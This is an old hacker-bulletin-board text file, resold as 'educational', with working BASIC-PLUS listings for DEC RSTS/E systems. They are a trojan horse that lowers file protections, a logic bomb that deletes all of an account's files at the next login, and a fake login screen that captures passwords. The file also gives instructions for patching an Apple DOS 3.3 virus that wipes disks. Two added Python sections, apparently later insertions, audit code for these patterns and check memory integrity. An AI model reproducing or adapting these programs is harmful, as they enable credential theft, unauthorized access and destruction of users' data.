Filename = BBSFILES.DOC
THE FOLLOWING FILES WERE DOWNLOADED BY ME IN ONE EVENING, USING AN IBM-PC AND
MODEM. THEY WERE DOWNLOADED TO SHOW THE NATURE OF THE INFORMATION READILY
AVAILABLE TO THE THOUSANDS WHO ACCESS HACKER BOARDS - PROVIDED FOR
EDUCATIONAL PURPOSES ONLY, AND NOT TO RECOMMEND OR IMPLY ANY ILLEGAL USE
WHATSOEVER. THESE FILES JUST RELATE TO COMPUTER PHREAKING. THERE ARE MANY
MORE ON PHONE BOXING, WEAPONRY AND EXPLOSIVES, LOCKPICKING - YOU NAME IT!
(we are very interested in increasing this file for future updates of
COMPUTER PHREAKING and, separately, adding similar files for our PHONE COLOR
BOXES, and other technical and survival topics we have interest in (see our
catalog). If you have some good public domain info. for us, please send it
to us in an ASCII file(s), on 5.25" or 3.5" disk (use First Class Mail only),
to: CONSUMERTRONICS, 2011 Crescent Dr., P.O. Drawer 537, Alamogordo, NM
88310. If you require compensation for your help, let us know in advance
what you have and what you would like for it.)
D/L1------------------------------
Virus, Trojan Horse, and Decoy Programs:
DEC MAINFRAMES:
===============
The following were developed and tested on DEC Basic Plus, running under
the RSTS/E Operating system. All have been tested, and were successfully used
in the field. However, successful use depends on the savvy of the sysop,
legitimate users, and illegitimate ones. They work best on uninformed
(stupid) users and sysops, and when the hacker using them makes them
attractive, as when using trojan horses, or realistic, when using decoys.
TROJAN HORSE:
=============
What follows is a rough listing of the business end of a typical trojan
horse program. While this one just lowers the security of the programs on
the affected account, it could be easily modified to create another account,
or execute any other command. The key is the 'sy$=sys(chr$(14)+"....")'
statement. In BASIC PLUS Programming language, this command lets you execute
a DCL command from within a BASIC Program. Therefore, any DCL command, COPY,
DELETE, PIP, or even BYE could be inserted in the "...." space. I prefer
using PIP *.* <40> /RE, as what that will do is lower the protection codes
low enough for me to see the files on the account. This works with both
sysops and non-privileged users, so I can benefit whenever someone runs it,
as opposed to something the sysop has to run in order for it to do whatever.
As a plus, if a sysop runs it, certain hidden files on the [1,*] account he/
she's using will become visible, which will, provided you know what you're
doing, enable you to get sysop status. Of course, you could also use PIP
[*,*] *.* <40> /RE, which, if a sysop runs it, will lower the protection of
every file on the system. One would have to add an error checking routine in
case a non-sysop ran it.
10 extend
20 sy$=sys(chr$(14)+"PIP *.* <40> /RE")
30 rem the following would be the interesting little game you've written which
40 rem makes the program look attractive, and compels the hapless user to
50 rem run it.
60 end
LOGIC BOMB:
===========
The following is an example of a simple logic bomb, which has proven to
work very well. What it does is create a file on the affected account which
will delete all files on the account upon the next login. It also dumps the
user off the system for good measure. You could remove the logoff procedure
and not affect program operation, but they then stand a chance of noticing
the little file you've added.
10 extend
20 open "login.com" as file #1
30 print #1,"pip *.* <60> /re"
40 print #1,"delete *.*"
50 close #1
60 sy$=sys(chr$(14)+"bye/f")
70 end
Now, line 30 is optional in this program. I have included it in case the
user has protected his files from accidental deletion. There is one instance
in which this program won't work properly. This is when the default language
upon logon isn't DCL; on occasion, some systems have BASIC as the default. In
this case, just add the following line.
25 print #1,"sw dcl"
And you'll switch to DCL before continuing to the rest of the program.
THE DECOY:
==========
This decoy is to be used on local terminals, ones that are connected to
the system via RS-232, such as in schools. It is also the riskiest of these
programs to use. What it basically does is wait until input, and then act as a
login program, saving the user's id# and password. Upon getting it, it informs
the user of an "invalid entry" and then returns control to the system. There
are a number of things to keep in mind when using this program. The first is
to change the program so it looks like your system. The second is to
remember that it runs under the account it's on, therefore you take a risk of
someone hitting [Break] while it's running, and getting into your account.
Finally, due to the BASIC language, you'll only get the project number of the
account (what's before the comma). However, since you'll have the password,
you'll get it in less than 255 tries.
10 extend
20 open "kb:" as file #1%
30 input #1%, z$
40 print "RSTS v8.0-06 MICOM I Job <10> KB31: ";date$(0);" ";time$(0)
50 print
60 print "Username: ";
70 input #1%, u$
80 print "Password: ";
90 sy$=sys(chr$(3))
100 input #1%, p$
110 sy$=sys(chr$(2))
120 print: print "Invalid Entry - Try Again"
130 print: print
140 print "Username: ";
150 input #1%, r$
160 sy$=sys(chr$(3))
170 print "Password: ";
180 input #1%, s$
190 sy$=sys(chr$(2))
200 open "acct.txt" as file #2
210 print #2,u$
220 print #2,p$
230 print #2,r$
240 print #2,s$
250 close #2
260 print: print "Access Denied"
270 sy$=sys(chr$(14)+"bye/f")
280 end
The parts which have to be changed are line 40, and the number of tries
it allows before logging you off. The system I used for development allowed
only two tries, and most I've seen only allow two, but, it isn't always that
way. Finally, remember to save ALL input, for reasons which should be
obvious.
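A sysop's view of the three listings above, as an added example that is not part of the original file: a static audit of BASIC-PLUS source that flags the constructs those listings depend on. The function name, rule wording and sample listing are constructed for illustration; the matched patterns are the ones shown on this page.

```python
import re

# Patterns come from the listings on this page; rule wording is illustrative.
LINE = re.compile(r'^\s*(\d+)\s+(.*)$')
SYS = re.compile(r'sys\s*\(\s*chr\$\s*\(\s*(\d+)\s*\)(?:\s*\+\s*"([^"]*)")?\s*\)', re.I)
OPEN = re.compile(r'open\s+"([^"]+)"\s+as\s+file', re.I)
PRINT_TO_FILE = re.compile(r'print\s+#\d+%?\s*,\s*"([^"]*)"', re.I)
RISKY = re.compile(r'^(pip\b.*<\d+>|delete\b|bye\b)', re.I)

def audit(listing):
    """Return sorted (line_number, finding) pairs for one BASIC-PLUS listing."""
    findings, echo_off_at, opened = [], None, []
    for raw in listing.splitlines():
        m = LINE.match(raw)
        if not m or m.group(2).lower().startswith("rem"):
            continue  # not a numbered statement, or a comment
        num, stmt = int(m.group(1)), m.group(2)
        for code, cmd in SYS.findall(stmt):
            if code == "14":  # the command-execution call the text singles out
                level = "HIGH" if RISKY.match(cmd.strip()) else "INFO"
                findings.append((num, f"{level}: runs system command '{cmd}'"))
            elif code == "3" and echo_off_at is None:
                echo_off_at = num  # issued before the password input in the decoy
        for name in OPEN.findall(stmt):
            opened.append(name.lower())
            if name.lower() == "login.com":
                findings.append((num, "HIGH: opens login command file login.com"))
        for text in PRINT_TO_FILE.findall(stmt):
            if RISKY.match(text.strip()):
                findings.append((num, f"HIGH: writes command '{text}' to a file"))
    # Decoy shape: terminal opened as a file, sys code 3 used, a second file opened.
    if echo_off_at is not None and "kb:" in opened and len(set(opened)) > 1:
        findings.append((echo_off_at, "HIGH: reads kb: after sys code 3 and opens another file"))
    return sorted(findings)

# Constructed sample, assembled from statements that appear in the listings above.
SAMPLE = '''10 extend
20 sy$=sys(chr$(14)+"PIP *.* <40> /RE")
30 rem game code would follow here
40 open "login.com" as file #1
50 print #1,"delete *.*"
60 close #1
70 end'''

if __name__ == "__main__":
    for num, finding in audit(SAMPLE):
        print(f"line {num}: {finding}")
```

An INFO finding still deserves a look: any program a user is invited to run that issues system commands should be read before it is run from a privileged account.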
FREE MEMORY:
============
While this program isn't classified as a trojan horse, decoy, logic
bomb, or virus, it's quite interesting, and I've decided to include it. This
program enables you to look at unallocated space on the system's disk. It's
very useful when the sysop is creating and deleting accounts, and in schools
in order to yank deleted files, which happens when students are modifying
programs.
10 open "free.mem" as file #1%
20 put #1%, record nnnnn%
30 close #1%
GENERAL NOTES ON PC VIRUSES
===========================
Writing "funny programs" on PCs is a big pain-in-the-a__. There are two
major reasons why. The first is that most users know their PCs (Personal
Computers in general, not just IBM) like the back of their hand, and that any
weirdness would be immediately noticed, unlike a big multiuser system, where
there are amongst other users, and basically isolated in their own little
section of RAM. Secondly, they have to be extremely small, as to be hidden
effectively. While one can write the perfect virus with 64k, try writing
one in a few bytes of space. Personally, I feel the best way to screw over a
computer user is to put a magnet to his disks, but if you want to do it the
hard way, it is possible.
APPLE II+, //e, //c:
====================
The Apple series of computers is one of the simplest machines to
"infect", so to speak. Perhaps this is because its creator was a prima donna
hacker, but who knows. DOS 3.3 has several unused spots in it, which are
adequate to hide a virus in. They are (in hex) $B78D-$B792 and $BCDF-$BCFF.
You can also, on pre-1983 versions of DOS 3.3, use BA69-BA93. There are also
some spots which aren't unused, but are used for DOS commands such as
VERIFY, LOCK, UNLOCK, CHAIN, and MAXFILES. The classic virus program on the
Apple is a machine language program which counts how many times someone does a
certain function, such as CATALOG, LOAD, or SAVE, and upon reaching a certain
number, initializes the disk. It is based in DOS memory, which means that
once the affected disk is booted, it stays in the machine until power down,
and can affect any disk which is used with said machine. It will also be
transferred to any disk which is initialized by the machine. The actual program
is very simple, provided you know 6502 machine language. What you do is make
a patch to the Command handler entry point for the Catalog command. The
location for the command handler is from $9D1E to $9D55. Look around in
there until you find a string which says "6EA5" this is the entry point for
the Catalog Handler, which is $A56E. Remember that. Change it to the
beginning of your "modification". I recommend $BCDF, since it is the biggest
stretch of memory which is truly safe. You then write a program which will
do an LDX (Load X Register) from a memory location where your counter is,
say $B78D. You compare that memory to the number of times you want the
command to go through before deletion, say 20 hex. (CPA $20) if the number of
times is greater than the number in the Compare statement ($20) then jump
to the init subroutine (BPL $4F5A)(The INIT start location is $5A4F), if not,
then Increment the X Register by 1 (INX $01), store it (STX $8DB7), you then
continue with your program by Cataloging the disk (JMP $6EA5). End of
program. I have found this to be one of the best virus programs, as these
things go.
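An integrity check for the memory areas named above, as an added example that is not part of the original file: it compares a captured 64 KB memory image against a baseline taken from a known-clean boot of the same DOS 3.3 version and reports which bytes changed in the command handler table and in the areas the text describes as unused. The function names and the demo images are constructed; only the address ranges come from this page.

```python
# Address ranges named in the text above (inclusive).
WATCHED = {
    "command handler table": (0x9D1E, 0x9D55),
    "unused area $B78D": (0xB78D, 0xB792),
    "unused area $BCDF": (0xBCDF, 0xBCFF),
    "unused area $BA69 (pre-1983 DOS 3.3)": (0xBA69, 0xBA93),
}

def changed_runs(baseline, image, start, end):
    """Return [(first, last)] address runs in start..end where image differs."""
    runs, run_start = [], None
    for addr in range(start, end + 1):
        differs = baseline[addr] != image[addr]
        if differs and run_start is None:
            run_start = addr
        elif not differs and run_start is not None:
            runs.append((run_start, addr - 1))
            run_start = None
    if run_start is not None:          # run extends to the end of the region
        runs.append((run_start, end))
    return runs

def check_image(baseline, image):
    """Map region name -> changed runs, for watched regions that differ."""
    if len(baseline) != 0x10000 or len(image) != 0x10000:
        raise ValueError("expected two 64 KB memory images")
    report = {}
    for name, (start, end) in WATCHED.items():
        runs = changed_runs(baseline, image, start, end)
        if runs:
            report[name] = runs
    return report

def constructed_demo():
    """Constructed images: a blank baseline and a copy with altered bytes."""
    baseline = bytes(0x10000)
    image = bytearray(baseline)
    image[0x9D30:0x9D32] = b"\x01\x02"  # two handler-table bytes changed
    image[0xBCDF:0xBCE4] = b"\x01" * 5  # bytes appear in an area that was empty
    image[0x2000] = 0xFF                # outside the watched ranges, ignored
    return check_image(baseline, bytes(image))

if __name__ == "__main__":
    for region, runs in constructed_demo().items():
        print(region, [(hex(a), hex(b)) for a, b in runs])
```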
D/L2---------------------------------------